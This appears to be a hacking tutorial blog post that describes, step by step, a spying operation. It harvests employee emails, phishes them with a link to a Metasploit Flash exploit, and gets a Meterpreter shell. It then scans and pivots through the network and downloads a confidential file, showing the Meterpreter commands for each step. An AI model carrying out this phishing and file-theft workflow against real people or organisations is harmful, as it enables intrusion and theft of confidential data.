Hack Like a Pro: How to Spy on Anyone, Part 2 (Finding & Downloading Confidential Documents)
Welcome back, my tenderfoot hackers!
A short while ago, I started a new series called "How to Spy on Anyone." The idea behind this series is that computer hacking is increasingly being used in espionage and cyber warfare, as well as by private detectives and law enforcement to solve cases. I am trying to demonstrate, in this series, ways that hacking is being used in these professions. For those of you who are training for those careers, I dedicate this series.
In some cases, when we are charged with spying on a suspect, we want to be able to go into their computer, look around, and download files or other documents that might be confidential, useful to a nation or cause, or might be used in a prosecution. In the world of cyber warfare, these might be strategic plans, communiqués, weapon assessments, etc.
In this tutorial, we will hack into our enemy's computers and look for secret documents that might indicate their future war plans that may compromise the sovereign integrity of our nation. We think that our adversary is secretly sneaking soldiers and intelligence agents into our country and claiming that they are freedom fighters. (Sound familiar?)
Our task is to hack into their military leaders computers and find evidence that these freedom fighters are actually soldiers and agents of our adversarial, but very powerful neighbor. Not only must we find the information, but we must download a copy so that we we can show our leaders, and maybe the world, the evidence of their malevolent intentions and actions.
Our strategy will be to attempt to compromise someone's computer at headquarters—anyone's. Once we have compromised their computer, we can then pivot from there to any computer on the network and then search for confidential files and, if we find any, transfer them back to our computer.
Let's get started on this critical and dangerous task to our nation's survival!
As we saw earlier, Adobe Flash Player is among the most vulnerable applications on nearly everyone's computer. If you using a browser, you probably have Adobe's Flash Player on your computer. This makes it a very attractive target.
In an earlier tutorial, I showed how we can exploit Adobe Flash Player on nearly every computer with Internet Explorer 6-11 with Flash 11-13 on Windows XP SP3, Windows 7 SP1, and Windows 8. That's a pretty broad brush of targets. Perfect for this job!
The only drawback is that we need to get someone to click on a malicious link. Although everyone is warned not to, people still do so every day when they receive an email from someone they think they know, or even if the email sounds compelling enough. Even you may have done so.
We only need one person at the headquarters to click on our link to take down the entire network. As our first step, let's gather email addresses from headquarters using Maltego. To learn how to use Maltego to harvest email addresses, check out this tutorial.
Now, that we have the emails of employees at our enemy's headquarters, let's generate the malicious code in Metasploit and launch our server with the code. To learn how to use this exploit, check out this tutorial.
Now that our server is up with the malicious code, let's send emails with this link to all the employees we found with Maltego.
Sometimes the best advice is simply to be patient. We sent out the emails to all the employees at headquarters and now we simply need to be patient and wait for someone to click on the link we sent.
We waited nearly 48 hours, but finally—success! Someone clicked on our link and we have a Meterpreter shell on their system!
Now that we own one machine on the network, we can do an ARP scan to find every other machine on the network. This will give us the IP address and MAC address of every machine on this network.
meterpreter > run arp_scan -r 192.168.1.0/24
Next, we can pivot so that we can access all the systems on the network. To learn how to pivot to the entire network, just check out this tutorial.
Since we only found two systems on this network, let's look inside the machine we compromised first before going on to the others. We know the document we are looking for is likely named "war strategy." We can search the entire hard drive of the compromised system by using the search command built into the Meterpreter.
meterpreter > search -f "war strategy.txt"
Great ! We found it in the directory c:\confidential !
Now that we have the document we are looking for, let's download it from the target's computer to ours.
meterpreter > download c:\\confidential\\"war strategy.txt"
Finally, let's check to see whether the file arrived at our system. The Meterpreter will send the file to the last working directory where we invoked the msfconsole. In this case, it was /root. So, let's go back to our Kali system, open a terminal and navigate to /root, and see whether the "war strategy.txt" file has arrived.
kali > cd /root
kali> ls -l
There it is! Success!
We now have the file that lays out our enemy's war strategy and may be critical to saving our nation from invasion and subordination to our most hated neighbor and adversary!
Keep coming back, my tenderfoot hackers, as we master the fine arts of hacking!